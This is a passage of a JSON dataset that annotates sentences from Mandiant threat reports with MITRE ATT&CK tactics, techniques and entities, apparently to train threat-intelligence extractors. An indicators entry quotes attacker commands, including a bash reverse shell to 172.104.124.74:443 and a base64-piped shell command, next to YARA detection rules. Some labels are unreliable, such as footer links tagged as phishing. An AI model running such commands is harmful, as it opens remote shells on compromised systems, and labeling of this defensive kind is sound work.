"ThreatActor" }, { "text": "UNC302", "start": 12, "end": 18, "label": "ThreatActor" }, { "text": "MSS", "start": 141, "end": 144, "label": "ThreatActor" }, { "text": "target strategically interesting global organizations", "start": 148, "end": 201, "label": "Action" } ] }, { "uid": "mandiant-25_mandiant_report-p1-s73-764cdc", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 73, "context_before": "UNC5174 and UNC302 operate within this model, and their operations provide insight into the initial access broker ecosystem leveraged by the MSS to target strategically interesting global organizations.", "sentence_text": "Remediation and Hardening Restrict access to the F5 TMUI from the internet.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s74-df793e", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 74, "context_before": "Remediation and Hardening Restrict access to the F5 TMUI from the internet.", "sentence_text": "Immediately apply the F5 mitigation script published in [ K000137353 ] to any vulnerable F5 appliances.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s75-9041de", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 75, "context_before": "Immediately apply the F5 mitigation script published in [ K000137353 ] to any vulnerable F5 appliances.", "sentence_text": "Investigate vulnerable F5 appliances for evidence of compromise.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s76-fc86e7", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 76, "context_before": "Investigate vulnerable F5 appliances for evidence of compromise.", "sentence_text": "In the event of F5 compromise:\nReview appliance configurations for unauthorized modifications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s77-2d2f6a", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 77, "context_before": "In the event of F5 compromise:\nReview appliance configurations for unauthorized modifications.", "sentence_text": "Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s78-4a1547", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 78, "context_before": "Review file system and operating system (OS) artifacts for evidence of privileged account creation and remove any unauthorized accounts.", "sentence_text": "Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s79-8eb439", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 79, "context_before": "Consider revoking and re-issuing sensitive cryptographic material such as certificates and private keys that may have been accessible to a threat actor.", "sentence_text": "For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller read our latest ScreenConnect remediation and hardening guide Indicators of Compromise (IOCs)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s80-9a59f6", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 80, "context_before": "For impacted ScreenConnect instances, Mandiant recommends that organizations with an on-premises controller read our latest ScreenConnect remediation and hardening guide Indicators of Compromise (IOCs)", "sentence_text": "Network IOCs\nURLs\nHost IOCs\nHost Based Indicators (Commands)\ncmd_data=run util bash -c \"echo dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= | base64 -d | sh\" \"tmsh -q -c 'cd /;show running-config recursive'\" run util bash -c \"bash -i /dev/tcp/172.104.124.74/443 0>&1 &\" Detections rule M_Backdoor_GOREVERSE_2 { meta:\nauthor = \"Mandiant\" description = \"This rule is designed to detect events related to goreverse.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s81-7ced26", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 81, "context_before": "Network IOCs\nURLs\nHost IOCs\nHost Based Indicators (Commands)\ncmd_data=run util bash -c \"echo dG1zaCAtcSAtYyAnY2QgLztzaG93IHJ1bm5pbmctY29uZmlnIHJlY3Vyc2l2ZSc= | base64 -d | sh\" \"tmsh -q -c 'cd /;show running-config recursive'\" run util bash -c \"bash -i /dev/tcp/172.104.124.74/443 0>&1 &\" Detections rule M_Backdoor_GOREVERSE_2 { meta:\nauthor = \"Mandiant\" description = \"This rule is designed to detect events related to goreverse.", "sentence_text": "GOREVERSE is a publicly available reverse shell\" md5 = \"5c175ea3664279d6c0c2609844de6949\" platforms = \"Windows,Linux,MacOS\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s82-af6a51", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 82, "context_before": "GOREVERSE is a publicly available reverse shell\" md5 = \"5c175ea3664279d6c0c2609844de6949\" platforms = \"Windows,Linux,MacOS\"", "sentence_text": "48 8B [5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B } $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 } $cc_rssh = \"rssh\" fullword $cc_validate_dest_len = { 48 83 3D [4] 00", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s83-4d6e34", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 83, "context_before": "48 8B [5] 48 8B [5] 48 8B [5] 4C 8B [5] 48 8B [5] 48 8B [5-10] E8 [4] 48 8B } $cc_print_help_amd64 = { 48 8D 15 [4] 48 89 94 24 [4-16] 48 8B 1D [4] 48 8D 05 [4-24] BF 03 00 00 00 48 89 FE [0-12] E8 } $cc_rssh = \"rssh\" fullword $cc_validate_dest_len = { 48 83 3D [4] 00", "sentence_text": "== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d and uint32(uint32(0x3C))", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s84-4c3729", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 84, "context_before": "== 0xcefaedfe) or (uint32(0) == 0xcffaedfe)) or (uint16(0) == 0x5a4d and uint32(uint32(0x3C))", "sentence_text": "== 0x00004550) or (uint32(0) == 0x464c457f))\nand (all of ($str*) or all of ($cc_*))\n}\nrule M_APT_Downloader_SNOWLIGHT_1\n{\nmeta:\nauthor = \"Mandiant\" description = \"This rule is designed to detect the SNOWLIGHT code family\" md5 = \"0951109dd1be0d84a33d52c135ba9c97\" platforms = \"Linux\" malware_family = \"SNOWLIGHT\" strings:\n$xor99 = { 80 31 99 48 FF C1 89 CE 29 EE 39 C6 7C F2 48 63 D2 48 89 EE 44 89 E7 } $memfdcreate = { BA 01 00 00 00", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s86-4e93de", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 86, "context_before": "BE 3B 0B 40 00", "sentence_text": "E8 8C FE FF FF } condition:\nuint32(0)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s87-2d7481", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 87, "context_before": "E8 8C FE FF FF } condition:\nuint32(0)", "sentence_text": "== 0x464c457f and all of them } Organizations can validate their security controls using the following actions with MITRE ATT&CK Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s88-3efe33", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 88, "context_before": "== 0x464c457f and all of them } Organizations can validate their security controls using the following actions with MITRE ATT&CK Posted in Threat Intelligence Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026", "sentence_text": "By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s89-b07996", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 89, "context_before": "By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nc867881c56698f938b4e8edafe76a09b | LG | ELF | SNOWLIGHT", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s90-aa77f8", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 90, "context_before": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read [FILTERED_TABLES_START]\nc867881c56698f938b4e8edafe76a09b | LG | ELF | SNOWLIGHT", "sentence_text": "df4603548b10211f0aa77d0e9a172438 | N/A | ELF | SNOWLIGHT 0951109dd1be0d84a33d52c135ba9c97", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s92-b4d2b0", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 92, "context_before": "|", "sentence_text": "N/A | ELF | SNOWLIGHT 9c3bf506dd19c08c0ed3af9c1708a770 | memfd:a | ELF | N", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s93-f16a5f", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 93, "context_before": "N/A | ELF | SNOWLIGHT 9c3bf506dd19c08c0ed3af9c1708a770 | memfd:a | ELF | N", "sentence_text": "/A 0ba435460fb7622344eec28063274b8a | undefined | ELF | SNOWLIGHT a78bf3d16349eba86719539ee8ef562d | N/A | ELF | SNOWLIGHT A106-917 | Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation A107-059 | Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1 A107-056 | Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1 Initial Access |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s94-9e0120", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 94, "context_before": "/A 0ba435460fb7622344eec28063274b8a | undefined | ELF | SNOWLIGHT a78bf3d16349eba86719539ee8ef562d | N/A | ELF | SNOWLIGHT A106-917 | Application Vulnerability - F5 BIG-IP 17.1.0, CVE-2023-46747, Exploitation A107-059 | Application Vulnerability - CVE-2024-1708, Exploitation, Variant #1 A107-056 | Application Vulnerability - CVE-2024-1709, Exploitation, Variant #1 Initial Access |", "sentence_text": "T1190 | Exploit Public-Facing Application Defense Evasion", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s95-2703c3", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 95, "context_before": "T1190 | Exploit Public-Facing Application Defense Evasion", "sentence_text": "| T1027 | Obfuscated Files or Information Discovery", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s96-2e2fe1", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 96, "context_before": "| T1027 | Obfuscated Files or Information Discovery", "sentence_text": "| T1016 | System Network Configuration Discovery | T1049 | System Network Connections Discovery | T1082", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s97-c0ec5a", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 97, "context_before": "| T1016 | System Network Configuration Discovery | T1049 | System Network Connections Discovery | T1082", "sentence_text": "| System Information Discovery | T1083 | File and Directory Discovery Command and Control | T1095", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s98-0e98b2", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 98, "context_before": "| System Information Discovery | T1083 | File and Directory Discovery Command and Control | T1095", "sentence_text": "| Non-Application Layer Protocol Persistence | T1136.001", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s99-74504c", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 99, "context_before": "| Non-Application Layer Protocol Persistence | T1136.001", "sentence_text": "| Local Account Impact |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s101-6b2681", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 101, "context_before": "T1531 | Account", "sentence_text": "Access Removal Credential Access | T1003.008 | /etc/passwd and /etc/shadow Initial Access | T1133 | External Remote Services", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s102-8c220e", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 102, "context_before": "Access Removal Credential Access | T1003.008 | /etc/passwd and /etc/shadow Initial Access | T1133 | External Remote Services", "sentence_text": "| T1190 | Exploit Public-Facing Application Collection", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s103-5f9984", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 103, "context_before": "| T1190 | Exploit Public-Facing Application Collection", "sentence_text": "| T1213 | Data from Information Repositories Persistence | T1505.003", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s104-5c0823", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 104, "context_before": "| T1213 | Data from Information Repositories Persistence | T1505.003", "sentence_text": "| Web Shell Defense Evasion |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s105-0f67e6", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 105, "context_before": "| Web Shell Defense Evasion |", "sentence_text": "T1027 | Obfuscated Files or Information Impact | T1529 | System Shutdown/Reboot |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s106-14fb57", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 106, "context_before": "T1027 | Obfuscated Files or Information Impact | T1529 | System Shutdown/Reboot |", "sentence_text": "T1203 | Exploitation for Client Execution Discovery | T1012 | Query Registry | T1016", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s107-220e18", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 107, "context_before": "T1203 | Exploitation for Client Execution Discovery | T1012 | Query Registry | T1016", "sentence_text": "| System Network Configuration Discovery | T1057 | Process Discovery | T1082", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s108-46bde1", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 108, "context_before": "| System Network Configuration Discovery | T1057 | Process Discovery | T1082", "sentence_text": "| System Information Discovery | T1083 | File and Directory Discovery | T1518 |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s109-24dd70", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 109, "context_before": "| System Information Discovery | T1083 | File and Directory Discovery | T1518 |", "sentence_text": "Software Discovery Credential Access | T1003 | OS Credential Dumping Lateral Movement | T1021.001", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s110-c9814b", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 110, "context_before": "Software Discovery Credential Access | T1003 | OS Credential Dumping Lateral Movement | T1021.001", "sentence_text": "| Remote Desktop Protocol Command and Control | T1071.001 | Web Protocols", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-25_mandiant_report-p1-s111-2b032d", "source": "mandiant", "doc_id": "25_mandiant_report", "page_number": 1, "sentence_id": 111, "context_before": "| Remote Desktop Protocol Command and Control | T1071.001 | Web Protocols", "sentence_text": "[FILTERED_TABLES_END]", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s1-353d36", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Chinese Espionage Group UNC3886 Found Exploiting CVE-2023-34048 Since Late 2021 | Google Cloud Blog Threat Intelligence Chinese Espionage Group UNC3886 Found Exploiting CVE-2023-34048 Since Late 2021 January 19, 2024", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s2-befd68", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 2, "context_before": "Chinese Espionage Group UNC3886 Found Exploiting CVE-2023-34048 Since Late 2021 | Google Cloud Blog Threat Intelligence Chinese Espionage Group UNC3886 Found Exploiting CVE-2023-34048 Since Late 2021 January 19, 2024", "sentence_text": "Written by: Alexander Marvi, Shawn Chew, Punsaen Boonyakarn While publicly reported and patched in October 2023, Mandiant and VMware Product Security have found UNC3886 , a highly advanced China-nexus espionage group, has been exploiting CVE-2023-34048 as far back as late 2021.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s3-beb456", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 3, "context_before": "Written by: Alexander Marvi, Shawn Chew, Punsaen Boonyakarn While publicly reported and patched in October 2023, Mandiant and VMware Product Security have found UNC3886 , a highly advanced China-nexus espionage group, has been exploiting CVE-2023-34048 as far back as late 2021.", "sentence_text": "These findings stem from Mandiant’s continued research of the novel attack paths used by UNC3886 , which historically focuses on technologies that are unable to have EDR deployed to them.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s4-71f219", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 4, "context_before": "These findings stem from Mandiant’s continued research of the novel attack paths used by UNC3886 , which historically focuses on technologies that are unable to have EDR deployed to them.", "sentence_text": "UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further demonstrates their capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s5-293d95", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 5, "context_before": "UNC3886 has a track record of utilizing zero-day vulnerabilities to complete their mission without being detected, and this latest example further demonstrates their capabilities.", "sentence_text": "When covering the discovery of CVE-2023-20867 in VMware’s tools, the attack path in Figure 1 was presented describing the flow of attacker activity within the VMware ecosystem (i.e. vCenter, ESXi Hypervisors, Virtualized Guest Machines).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s6-e9b743", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 6, "context_before": "When covering the discovery of CVE-2023-20867 in VMware’s tools, the attack path in Figure 1 was presented describing the flow of attacker activity within the VMware ecosystem (i.e. vCenter, ESXi Hypervisors, Virtualized Guest Machines).", "sentence_text": "At the time, with the evidence available, Mandiant continued researching how backdoors were being deployed to vCenter systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s7-35d58b", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 7, "context_before": "At the time, with the evidence available, Mandiant continued researching how backdoors were being deployed to vCenter systems.", "sentence_text": "In late 2023, a similarity was observed across impacted vCenter systems that explained how the attacker was gaining initial access to the vCenter systems.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s8-0ad8d8", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 8, "context_before": "In late 2023, a similarity was observed across impacted vCenter systems that explained how the attacker was gaining initial access to the vCenter systems.", "sentence_text": "Located in the VMware service crash logs, /var/log/vMonCoredumper.log, the following entries (Figure 2) show the \"vmdird\" service crashing minutes prior to attacker backdoors being deployed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s9-19c336", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 9, "context_before": "Located in the VMware service crash logs, /var/log/vMonCoredumper.log, the following entries (Figure 2) show the \"vmdird\" service crashing minutes prior to attacker backdoors being deployed.", "sentence_text": "I125: FILE: FileCreateDirectoryEx: Failed to create /tmp.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s10-f70cd2", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 10, "context_before": "I125: FILE: FileCreateDirectoryEx: Failed to create /tmp.", "sentence_text": "I125: FILE: FileCreateDirectoryEx: Failed to create /tmp/vmware-root.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s11-096b5d", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 11, "context_before": "I125: FILE: FileCreateDirectoryEx: Failed to create /tmp/vmware-root.", "sentence_text": "I125: Notify vMon about vmdird dumping core.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s12-94224f", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 12, "context_before": "I125: Notify vMon about vmdird dumping core.", "sentence_text": "I125: Successfully notified vMon.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s13-51ed09", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 13, "context_before": "I125: Successfully notified vMon.", "sentence_text": "I125: Successfully generated core file.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s14-946091", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 14, "context_before": "I125: Successfully generated core file.", "sentence_text": "Analysis of the core dump of \"vmdird\" by both Mandiant and VMware Product Security showed that the process crashing is closely aligned with the exploitation of CVE-2023-34048 , the out-of-bounds write vCenter vulnerability in the implementation of the DCE/RPC protocol patched in October 2023, which enables unauthenticated remote command execution on vulnerable systems.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit CVE-2023-34048 to enable remote command execution.", "entities": [ { "text": "exploitation of CVE-2023-34048", "start": 144, "end": 174, "label": "Action" }, { "text": "CVE-2023-34048", "start": 160, "end": 174, "label": "Infrastructure_Indicator" }, { "text": "vCenter", "start": 201, "end": 208, "label": "Infrastructure_Indicator" }, { "text": "unauthenticated remote command execution", "start": 308, "end": 348, "label": "Action" } ] }, { "uid": "mandiant-26_mandiant_report-p1-s15-35e4ff", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 15, "context_before": "Analysis of the core dump of \"vmdird\" by both Mandiant and VMware Product Security showed that the process crashing is closely aligned with the exploitation of CVE-2023-34048 , the out-of-bounds write vCenter vulnerability in the implementation of the DCE/RPC protocol patched in October 2023, which enables unauthenticated remote command execution on vulnerable systems.", "sentence_text": "Most environments where these crashes were observed had log entries preserved, but the \"vmdird\" core dumps themselves were removed.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s16-a96c88", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 16, "context_before": "Most environments where these crashes were observed had log entries preserved, but the \"vmdird\" core dumps themselves were removed.", "sentence_text": "VMware’s default configurations keep core dumps for an indefinite amount of time on the system, suggesting the core dumps were purposely removed by the attacker in an attempt to cover their tracks.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070", "name": "Indicator Removal on Host" } ], "procedure": "Remove core dumps to cover tracks.", "entities": [ { "text": "removed by the attacker", "start": 137, "end": 160, "label": "Action" }, { "text": "core dumps", "start": 111, "end": 121, "label": "Infrastructure_Indicator" } ] }, { "uid": "mandiant-26_mandiant_report-p1-s17-9c5b68", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 17, "context_before": "VMware’s default configurations keep core dumps for an indefinite amount of time on the system, suggesting the core dumps were purposely removed by the attacker in an attempt to cover their tracks.", "sentence_text": "As mentioned in the VMware advisory , this vulnerability has since been patched in vCenter 8.0U2 and Mandiant recommends VMware users updating to the latest version of vCenter to account for this vulnerability seeing exploitation in the wild.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-26_mandiant_report-p1-s18-6d31bd", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 18, "context_before": "As mentioned in the VMware advisory , this vulnerability has since been patched in vCenter 8.0U2 and Mandiant recommends VMware users updating to the latest version of vCenter to account for this vulnerability seeing exploitation in the wild.", "sentence_text": "Posted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Using fake job offers", "entities": [ { "text": "Vietnamese Actors", "start": 475, "end": 492, "label": "ThreatActor" }, { "text": "Using Fake Job", "start": 493, "end": 507, "label": "Action" }, { "text": "AI Tools", "start": 145, "end": 153, "label": "MalwareTool" } ] }, { "uid": "mandiant-26_mandiant_report-p1-s19-a7d332", "source": "mandiant", "doc_id": "26_mandiant_report", "page_number": 1, "sentence_id": 19, "context_before": "Posted in\nThreat Intelligence\nSecurity & Identity Related articles Threat Intelligence GTIG AI Threat Tracker: Advances in Threat Actor Usage of AI Tools By Google Threat Intelligence Group • 30-minute read Threat Intelligence Preparing for Threats to Come: Cybersecurity Forecast 2026 By Adam Greenberg • 4-minute read Threat Intelligence Keys to the Kingdom: A Defender's Guide to Privileged Account Monitoring By Mandiant • 39-minute read Threat Intelligence Help Wanted: Vietnamese Actors Using Fake Job", "sentence_text": "Posting Campaigns to Deliver Malware and Steal Credentials By Google Threat Intelligence Group • 6-minute read", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Posting Campaigns to Deliver Malware and Steal Credentials", "entities": [ { "text": "Posting Campaigns to Deliver Malware and Steal Credentials", "start": 0, "end": 58, "label": "Action" } ] }, { "uid": "mandiant-27_mandiant_report-p1-s1-35cf95", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Frost Radar™: Global Cyber Threat Intelligence Market, 2022 A Benchmarking System to Spark Companies to Action - Innovation that Fuels New Deal Flow and Growth Pipelines Global Security Research Team at Frost & Sullivan K7FA-74 November 2022", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mandiant-27_mandiant_report-p2-s2-81003a", "source": "mandiant", "doc_id": "27_mandiant_report", "page_number": 2, "sentence_id": 2, "context_before": "Frost Radar™: Global Cyber Threat Intelligence Market, 2022 A Benchmarking System to Spark Companies to Action - Innovation that Fuels New Deal Flow and Growth Pipelines Global Security Research Team at Frost & Sullivan K7FA-74 November 2022", "sentence_text": "Strategic Imperative\nand Growth\nEnvironment", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 